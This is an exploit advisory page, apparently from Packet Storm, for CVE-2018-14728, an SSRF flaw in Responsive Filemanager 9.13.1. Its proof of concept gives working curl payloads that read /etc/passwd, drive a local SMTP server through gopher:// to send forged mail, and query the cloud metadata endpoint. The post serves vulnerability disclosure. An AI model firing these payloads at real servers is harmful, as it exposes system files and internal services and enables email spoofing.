Twenty Year Anniversary

Responsive Filemanager 9.13.1 Server-Side Request Forgery

Responsive Filemanager 9.13.1 Server-Side Request Forgery
Posted Jul 29, 2018
Authored by Guia Brahim Fouad

Responsive Filemanager version 9.13.1 suffers from a server-side request forgery vulnerability.

tags | exploit
advisories | CVE-2018-14728
MD5 | 9ea189ebe988e84ea737aadd00966199

Responsive Filemanager 9.13.1 Server-Side Request Forgery

Change Mirror Download
 # Exploit Title: Responsive filemanager - SSRF
# Date: 29/07/2018
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link:
https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728

Type
[Security] Bug report - SSRF - Security Issue

PoC
curl 'http://localhost/filemanager/upload.php' --data
'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://
127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=
http://169.254.169.254/openstack'
...

Description of the problem
Server Side Request Forgery (SSRF) refers to an attack where in an attacker
is able to send a crafted request from a vulnerable web application. SSRF
is usually used to target internal systems behind firewalls that are
normally inaccessible to an attacker from the external network.
Additionally, itas also possible for an attacker to leverage SSRF to access
services from the same server that is listening on the loopback interface
(127.0.0.1).

Typically Server Side Request Forgery (SSRF) occurs when a web application
is making a request, where an attacker has full or partial control of the
request that is being sent. A common example is when an attacker can
control all or part of the URL to which the web application makes a request
to some third-party service

List the steps to reproduce the issue
The GET parameter 'url' is received in line 71 of the file upload.php.

File : upload.php

Line| Code
71 | if(isset($_POST['url'])){
73 | $ch = curl_init($_POST['url']);
77 | curl_exec($ch);

Environment
responsive filemanager version: 9.13.1
php version: 7.0

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    16 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close